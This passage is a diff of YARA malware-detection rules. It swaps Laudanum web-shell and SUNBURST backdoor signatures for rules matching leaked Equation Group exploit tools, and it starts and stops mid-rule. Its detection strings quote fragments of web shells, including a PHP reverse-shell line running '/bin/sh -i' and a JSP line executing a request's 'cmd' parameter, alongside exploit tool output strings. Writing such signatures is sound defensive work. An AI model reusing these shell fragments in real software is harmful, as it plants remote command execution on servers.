-		hash = "3ef03bbe3649535a03315dcfc1a1208a09cea49d"
-		logic_hash = "ea8e320abb57e0467db92271f7d36f144f85e04ce15cd9fa8d3f53dfa8d43929"
+		logic_hash = "34dc21d933d56b6f6c342ca110d9cff7bb51d9fd1b88b359861e5b5650679ad0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "619944358bc0e1faffd652b6af0600de055c5e7f1f1d91a8051ed9adf5a5b465"
 
 	strings:
-		$s1 = "$process = proc_open($shell, $descriptorspec, $pipes);" fullword ascii
-		$s2 = "printit(\"Successfully opened reverse shell to $ip:$port\");" fullword ascii
-		$s3 = "$input = fread($pipes[1], $chunk_size);" fullword ascii
+		$s1 = "[-] Failed to mmap file: %s" fullword ascii
+		$s2 = "[-] can not NULL terminate input data" fullword ascii
+		$s3 = "Missing argument for `-x'." fullword ascii
+		$s4 = "[!] Value has size of 0!" fullword ascii
 
 	condition:
-		filesize < 15KB and all of them
+		( uint16( 0 ) == 0x457f and filesize < 60KB and 2 of them )
 }
-rule SIGNATURE_BASE_Php_Dns : FILE
+rule SIGNATURE_BASE_Equationgroup_Watcher_Linux_X86_64_V_3_3_0 : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file dns.php"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a52e453b-07aa-58b9-91e7-f2426a8e8976"
-		date = "2015-06-22"
+		id = "4077242e-a0f2-54a8-afad-f52b8ed874ba"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L175-L191"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1435-L1450"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "01d5d16d876c55d77e094ce2b9c237de43b21a16"
-		logic_hash = "650eecc06f215ae6a15078c87d8a8c1597ca9e3d735eacd17b046a9d9deb6aa8"
+		logic_hash = "be2ca3791ef1025db6a1dd6bcdf1a9f0b224c3f7585af4546029840251c50094"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a8d65593f6296d6d06230bcede53b9152842f1eee56a2a72b0a88c4f463a09c3"
 
 	strings:
-		$s1 = "$query = isset($_POST['query']) ? $_POST['query'] : '';" fullword ascii
-		$s2 = "$result = dns_get_record($query, $types[$type], $authns, $addtl);" fullword ascii
-		$s3 = "if ($_SERVER[\"REMOTE_ADDR\"] == $IP)" fullword ascii
-		$s4 = "foreach (array_keys($types) as $t) {" fullword ascii
+		$s1 = "forceprismheader" fullword ascii
+		$s2 = "invalid option `" fullword ascii
+		$s3 = "forceprism" fullword ascii
 
 	condition:
-		filesize < 15KB and all of them
+		( uint16( 0 ) == 0x457f and filesize < 900KB and all of them )
 }
-rule SIGNATURE_BASE_WEB_INF_Web : FILE
+rule SIGNATURE_BASE_Equationgroup_Linux_Exactchange : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file web.xml"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8d0a008c-56d1-59ef-8521-0697add21ba9"
-		date = "2015-06-22"
+		id = "cd9487be-57c5-5352-bce7-f9510166182d"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L193-L207"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1452-L1472"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0251baed0a16c451f9d67dddce04a45dc26cb4a3"
-		logic_hash = "b58bb63a5268812ed6a5d18c8da96b0fdae33e4802a2fba4964ab69e92517a16"
+		logic_hash = "a0bcf5aa1f434fe9698a7408df68870d4908cdf87f22bb4acfedc50bb2c8f11f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "dfecaf5b85309de637b84a686dd5d2fca9c429e8285b7147ae4213c1f49d39e6"
+		hash2 = "6ef6b7ec1f1271503957cf10bb6b1bfcedb872d2de3649f225cf1d22da658bec"
+		hash3 = "39d4f83c7e64f5b89df9851bdba917cf73a3449920a6925b6cd379f2fdec2a8b"
+		hash4 = "15e12c1c27304e4a68a268e392be4972f7c6edf3d4d387e5b7d2ed77a5b43c2c"
 
 	strings:
-		$s1 = "<servlet-name>Command</servlet-name>" fullword ascii
-		$s2 = "<jsp-file>/cmd.jsp</jsp-file>" fullword ascii
+		$x1 = "[+] looking for vulnerable socket" fullword ascii
+		$x2 = "can't use 32-bit exploit on 64-bit target" fullword ascii
+		$x3 = "[+] %s socket ready, exploiting..." fullword ascii
+		$x4 = "[!] nothing looks vulnerable, trying everything" fullword ascii
 
 	condition:
-		filesize < 1KB and all of them
+		( uint16( 0 ) == 0x457f and filesize < 2000KB and 1 of them )
 }
-rule SIGNATURE_BASE_Jsp_Cmd : FILE
+rule SIGNATURE_BASE_Equationgroup_X86_Linux_Exactchange : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file cmd.war"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "74db62b8-82d5-5a34-aa72-2f85053715a4"
-		date = "2015-06-22"
+		id = "b39e0c6e-b427-5085-99f8-88b2e00bb110"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L209-L226"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1474-L1490"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "55e4c3dc00cfab7ac16e7cfb53c11b0c01c16d3d"
-		logic_hash = "ab5b013a385549322bcb2811fa1a2d14b5633e2c41b9486b1e1c50c02437b8e6"
+		logic_hash = "9365eb74a364eb83150672919ea1abe635465fe3239fff26ba91037c74971466"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "dfecaf5b85309de637b84a686dd5d2fca9c429e8285b7147ae4213c1f49d39e6"
+		hash2 = "6ef6b7ec1f1271503957cf10bb6b1bfcedb872d2de3649f225cf1d22da658bec"
 
 	strings:
-		$s0 = "cmd.jsp}" fullword ascii
-		$s1 = "cmd.jspPK" fullword ascii
-		$s2 = "WEB-INF/web.xml" fullword ascii
-		$s3 = "WEB-INF/web.xmlPK" fullword ascii
-		$s4 = "META-INF/MANIFEST.MF" fullword ascii
+		$x1 = "kernel has 4G/4G split, not exploitable" fullword ascii
+		$x2 = "[+] kernel stack size is %d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 2KB and all of them
+		( uint16( 0 ) == 0x457f and filesize < 1000KB and 1 of them )
 }
-rule SIGNATURE_BASE_Laudanum : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Eclipsedwing_Rpcproxy_Pcdlllauncher : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file laudanum.php"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8c836aba-3644-5914-a3ff-937d0a6cd378"
-		date = "2015-06-22"
+		id = "8dd15424-e1b5-5543-97d5-3b3a83faa428"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L228-L242"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1502-L1519"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fd498c8b195967db01f68776ff5e36a06c9dfbfe"
-		logic_hash = "53caad87d22b5f13e5b7be8720baa1d436cc57d8062ec5d557df8524a2ccfb68"
+		logic_hash = "8a01ea872c161521301182b922ece893f9ad1a33d902ec94963946f3b07d7266"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "48251fb89c510fb3efa14c4b5b546fbde918ed8bb25f041a801e3874bd4f60f8"
+		hash2 = "237c22f4d43fdacfcbd6e1b5f1c71578279b7b06ea8e512b4b6b50f10e8ccf10"
+		hash3 = "79a584c127ac6a5e96f02a9c5288043ceb7445de2840b608fc99b55cf86507ed"
 
 	strings:
-		$s1 = "public function __activate()" fullword ascii
-		$s2 = "register_activation_hook(__FILE__, array('WP_Laudanum', 'activate'));" fullword ascii
+		$x1 = "[-] Failed to Prepare Payload!" fullword ascii
+		$x2 = "ShellcodeStartOffset" fullword ascii
+		$x3 = "[*] Waiting for AuthCode from exploit" fullword ascii
 
 	condition:
-		filesize < 5KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_Php_File : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Explodingcantouch_1_2_1 : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file file.php"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "68456891-6828-5e42-b8a0-67ecaf83cdc0"
-		date = "2015-06-22"
+		id = "66a09bfc-992d-5152-9fd6-9d7bcfb8b92f"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L244-L260"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1521-L1536"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7421d33e8007c92c8642a36cba7351c7f95a4335"
-		logic_hash = "85c14a9c8a6aece231b1cb6dcdd7ed39fdc6aced868c34557ee2e2204ce7007b"
+		logic_hash = "9239a61e71c86fc239f75baa9c781da18553e3c502495ad7429eaf3c744e870c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0cdde7472b077610d0068aa7e9035da89fe5d435549749707cae24495c8d8444"
 
 	strings:
-		$s1 = "$allowedIPs =" fullword ascii
-		$s2 = "<a href=\"<?php echo $_SERVER['PHP_SELF']  ?>\">Home</a><br/>" fullword ascii
-		$s3 = "$dir  = isset($_GET[\"dir\"])  ? $_GET[\"dir\"]  : \".\";" fullword ascii
-		$s4 = "$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";" fullword ascii
+		$x1 = "[-] Connection closed by remote host (TCP Ack/Fin)" fullword ascii
+		$s2 = "[!]Warning: Error on first request - path size may actually be larger than indicated." fullword ascii
+		$s4 = "<http://%s/%s> (Not <locktoken:write1>) <http://%s/>" fullword ascii
 
 	condition:
-		filesize < 10KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 1 of them )
 }
-rule SIGNATURE_BASE_Warfiles_Cmd : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Architouch_1_0_0 : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file cmd.jsp"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f974255b-cfbe-57b0-af1f-eddb7f12f5ed"
-		date = "2015-06-22"
+		id = "c5af05b5-9dfa-535f-b9ea-c82ef79bae7e"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L262-L278"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1538-L1551"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3ae3d837e7b362de738cf7fad78eded0dccf601f"
-		logic_hash = "64724b24d9f5b5d78e231ea8196abb609237cc430c49f6ceeb99c9684a904568"
+		logic_hash = "cb6959b7b50e6f2895bab5f3355bef836c9a9774285cfb5fea339ce3d2c67f73"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc"
 
 	strings:
-		$s1 = "Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));" fullword ascii
-		$s2 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword ascii
-		$s3 = "<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">" fullword ascii
-		$s4 = "String disr = dis.readLine();" fullword ascii
+		$s1 = "[+] Target is %s" fullword ascii
 
 	condition:
-		filesize < 2KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Asp_Dns : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Erraticgopher_1_0_1 : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file dns.asp"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b0e30ca0-7163-5731-98c5-5a1893b8ea80"
-		date = "2015-06-22"
+		id = "1a3fe877-b9ae-50e4-bb1a-c9dcd4d4a657"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L280-L296"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1553-L1569"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5532154dd67800d33dace01103e9b2c4f3d01d51"
-		logic_hash = "808e879238a0c24e975c260fc95c05c91bdc0f73553a241bd00f5bf7e6622639"
+		logic_hash = "6b099bd202a962e64cb4f417eb7e09893b869e950eb0740394d222e8b4b89283"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3d11fe89ffa14f267391bc539e6808d600e465955ddb854201a1f31a9ded4052"
 
 	strings:
-		$s1 = "command = \"nslookup -type=\" & qtype & \" \" & query " fullword ascii
-		$s2 = "Set objCmd = objWShell.Exec(command)" fullword ascii
-		$s3 = "Response.Write command & \"<br>\"" fullword ascii
-		$s4 = "<form name=\"dns\" method=\"POST\">" fullword ascii
+		$x1 = "[-] Error appending shellcode buffer" fullword ascii
+		$x2 = "[-] Shellcode is too big" fullword ascii
+		$x3 = "[+] Exploit Payload Sent!" fullword ascii
+		$x4 = "[+] Bound to Dimsvc, sending exploit request to opnum 29" fullword ascii
 
 	condition:
-		filesize < 21KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 1 of them )
 }
-rule SIGNATURE_BASE_Php_Reverse_Shell_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Esteemaudit_2_1_0 : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools - file php-reverse-shell.php"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f10cc33e-0cb6-5d08-af1f-5ef76368de9d"
-		date = "2015-06-22"
+		id = "95594756-1872-5d86-877f-0977bd3c067b"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L298-L312"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1571-L1585"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "025db3c3473413064f0606d93d155c7eb5049c42"
-		logic_hash = "695dc565c273ed358f7d56526fa4956ba13b216d8897d0707e1660a82b745081"
+		logic_hash = "272d435758c0021bfd84d84c00eb05ece2461a39d092693b61d362365ab098cd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "61f98b12c52739647326e219a1cf99b5440ca56db3b6177ea9db4e3b853c6ea6"
 
 	strings:
-		$s1 = "$process = proc_open($shell, $descriptorspec, $pipes);" fullword ascii
-		$s7 = "$shell = 'uname -a; w; id; /bin/sh -i';" fullword ascii
+		$x1 = "[+] Connected to target %s:%d" fullword ascii
+		$x2 = "[-] build_exploit_run_x64():" fullword ascii
 
 	condition:
-		filesize < 10KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_Laudanum_Tools_Generic : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Darkpulsar_1_1_0 : FILE
 {
 	meta:
-		description = "Laudanum Injector Tools"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "15738788-5f34-54d0-92fe-f7024c998a54"
-		date = "2015-06-22"
+		id = "0f4f77d7-99bc-5c84-84bf-877c4e79c9f0"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "http://laudanum.inguardians.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L314-L345"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1587-L1601"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "52c6d3be4fc91e8a61645886fa89bf78eddad51960702ff2ac83ec01d5d529ef"
+		logic_hash = "da8e1723da9e2d9955a3042bceb313d7d10903bfc078ba090c1c5a57be243b96"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "076aa781a004ecb2bf545357fd36dcbafdd68b1a"
-		hash1 = "885e1783b07c73e7d47d3283be303c9719419b92"
-		hash2 = "01d5d16d876c55d77e094ce2b9c237de43b21a16"
-		hash3 = "7421d33e8007c92c8642a36cba7351c7f95a4335"
-		hash4 = "f49291aef9165ee4904d2d8c3cf5a6515ca0794f"
-		hash5 = "c0dee56ee68719d5ec39e773621ffe40b144fda5"
-		hash6 = "f32b9c2cc3a61fa326e9caebce28ef94a7a00c9a"
-		hash7 = "dc5c03a21267d024ef0f5ab96a34e3f6423dfcd6"
-		hash8 = "fd498c8b195967db01f68776ff5e36a06c9dfbfe"
-		hash9 = "b50ae35fcf767466f6ca25984cc008b7629676b8"
-		hash10 = "5570d10244d90ef53b74e2ac287fc657e38200f0"
-		hash11 = "42bcb491a11b4703c125daf1747cf2a40a1b36f3"
-		hash12 = "83e4eaaa2cf6898d7f83ab80158b64b1d48096f4"
-		hash13 = "dec7ea322898690a7f91db9377f035ad7072b8d7"
-		hash14 = "a2272b8a4221c6cc373915f0cc555fe55d65ac4d"
-		hash15 = "588739b9e4ef2dbb0b4cf630b73295d8134cc801"
-		hash16 = "43320dc23fb2ed26b882512e7c0bfdc64e2c1849"
+		hash1 = "b439ed18262aec387984184e86bfdb31ca501172b1c066398f8c56d128ba855a"
 
 	strings:
-		$s1 = "***  laudanum@secureideas.net" fullword ascii
-		$s2 = "*** Laudanum Project" fullword ascii
+		$x1 = "[%s] - Error upgraded DLL architecture does not match target architecture (0x%x)" fullword ascii
+		$x2 = "[%s] - Error building DLL loading shellcode" fullword ascii
 
 	condition:
-		filesize < 60KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_APT_Backdoor_SUNBURST_1
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Educatedscholar_1_0_0 : FILE
 {
 	meta:
-		description = "This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions. The first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver names/paths. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services."
-		author = "FireEye"
-		id = "74b44844-5575-53d7-819b-ab1b2327a144"
-		date = "2020-12-14"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "37ca8de5-435b-5c1a-83b8-5704fa137604"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_solarwinds_sunburst.yar#L6-L27"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1603-L1617"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1fc006dead2fd540717e00e468bf30f37bdb1d061a805e33683e4a77db7f9156"
-		score = 85
-		quality = 77
-		tags = ""
+		logic_hash = "0265ce5dfb5697a0610a6023b75f6e3ef2ef0308f639978a8617337df2e16c77"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4cce9e39c376f67c16df3bcd69efd9b7472c3b478e2e5ef347e1410f1105c38d"
 
 	strings:
-		$cmd_regex_encoded = "U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA" wide
-		$cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D }
-		$fake_orion_event_encoded = "U3ItS80rCaksSFWyUvIvyszPU9IBAA==" wide
-		$fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C }
-		$fake_orion_eventmanager_encoded = "U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==" wide
-		$fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67 65 72 22 2C }
-		$fake_orion_message_encoded = "U/JNLS5OTE9VslKqNqhVAgA=" wide
-		$fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 }
-		$fnv_xor = { 67 19 D8 A7 3B 90 AC 5B }
+		$x1 = "[+] Shellcode Callback %s:%d" fullword ascii
+		$x2 = "[+] Exploiting Target" fullword ascii
 
 	condition:
-		$fnv_xor and ( $cmd_regex_encoded or $cmd_regex_plain ) or ( ( $fake_orion_event_encoded or $fake_orion_event_plain ) and ( $fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain ) and ( $fake_orion_message_encoded and $fake_orion_message_plain ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_Backdoor_SUNBURST_2
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Doublepulsar_1_3_1 : FILE
 {
 	meta:
-		description = "The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2 communications. This rule is looking for each branch of the code that checks for which HTTP method is being used. This is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally designed so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services."
-		author = "FireEye"
-		id = "329071d5-c9c6-5ae1-a514-aea9f4037bac"
-		date = "2020-12-14"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "99711157-58eb-5ec0-bb9f-bf953cd10125"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_solarwinds_sunburst.yar#L28-L79"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1619-L1634"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2bf0697b110bca88f712cbccaf0d2ba614d6093d6d9595659aefe088848d3826"
-		score = 85
-		quality = 83
-		tags = ""
+		logic_hash = "1b7ed9dbd4312541bd4d939602f63ce1d909729cce1845b018be6a07a9cb7fe2"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13"
 
 	strings:
-		$a = "0y3Kzy8BAA==" wide
-		$aa = "S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA" wide
-		$ab = "S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=" wide
-		$ac = "C88sSs1JLS4GAA==" wide
-		$ad = "C/UEAA==" wide
-		$ae = "C89MSU8tKQYA" wide
-		$af = "8wvwBQA=" wide
-		$ag = "cyzIz8nJBwA=" wide
-		$ah = "c87JL03xzc/LLMkvysxLBwA=" wide
-		$ai = "88tPSS0GAA==" wide
-		$aj = "C8vPKc1NLQYA" wide
-		$ak = "88wrSS1KS0xOLQYA" wide
-		$al = "c87PLcjPS80rKQYA" wide
-		$am = "Ky7PLNAvLUjRBwA=" wide
-		$an = "06vIzQEA" wide
-		$b = "0y3NyyxLLSpOzIlPTgQA" wide
-		$c = "001OBAA=" wide
-		$d = "0y0oysxNLKqMT04EAA==" wide
-		$e = "0y3JzE0tLknMLQAA" wide
-		$f = "003PyU9KzAEA" wide
-		$h = "0y1OTS4tSk1OBAA=" wide
-		$i = "K8jO1E8uytGvNqitNqytNqrVA/IA" wide
-		$j = "c8rPSQEA" wide
-		$k = "c8rPSfEsSczJTAYA" wide
-		$l = "c60oKUp0ys9JAQA=" wide
-		$m = "c60oKUp0ys9J8SxJzMlMBgA=" wide
-		$n = "8yxJzMlMBgA=" wide
-		$o = "88lMzygBAA==" wide
-		$p = "88lMzyjxLEnMyUwGAA==" wide
-		$q = "C0pNL81JLAIA" wide
-		$r = "C07NzXTKz0kBAA==" wide
-		$s = "C07NzXTKz0nxLEnMyUwGAA==" wide
-		$t = "yy9IzStOzCsGAA==" wide
-		$u = "y8svyQcA" wide
-		$v = "SytKTU3LzysBAA==" wide
-		$w = "C84vLUpOdc5PSQ0oygcA" wide
-		$x = "C84vLUpODU4tykwLKMoHAA==" wide
-		$y = "C84vLUpO9UjMC07MKwYA" wide
